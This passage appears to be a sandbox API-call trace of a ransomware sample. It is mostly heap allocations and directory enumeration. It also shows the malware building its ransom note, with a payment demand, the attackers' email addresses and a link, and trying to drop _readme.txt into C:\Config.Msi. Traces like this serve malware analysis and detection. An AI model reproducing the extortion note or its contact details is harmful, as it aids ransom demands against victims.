encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.504] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.504] CreateFileW (lpFileName="C:\\Config.Msi\\_readme.txt" (normalized: "c:\\config.msi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449d0 | out: hHeap=0xcd0000) returned 1 [0165.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0165.505] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0xffffffff [0165.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0165.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c110 | out: hHeap=0xcd0000) returned 1 [0165.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b410f8 [0165.505] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41140 [0165.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41140 | out: hHeap=0xcd0000) returned 1 [0165.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41140 [0165.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41140 | out: hHeap=0xcd0000) returned 1 [0165.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41140 [0165.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41140 | out: hHeap=0xcd0000) returned 1 [0165.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41140 [0165.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41140 | out: hHeap=0xcd0000) returned 1 [0165.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41140 [0165.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41140 | out: hHeap=0xcd0000) returned 1 [0165.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41140 [0165.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41140 | out: hHeap=0xcd0000) returned 1 [0165.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b410f8 | out: hHeap=0xcd0000) returned 1 [0165.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c110 [0165.506] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c110 | out: hHeap=0xcd0000) returned 1 [0165.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c110 [0165.508] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c110 | out: hHeap=0xcd0000) returned 1 [0165.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0165.510] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.511] 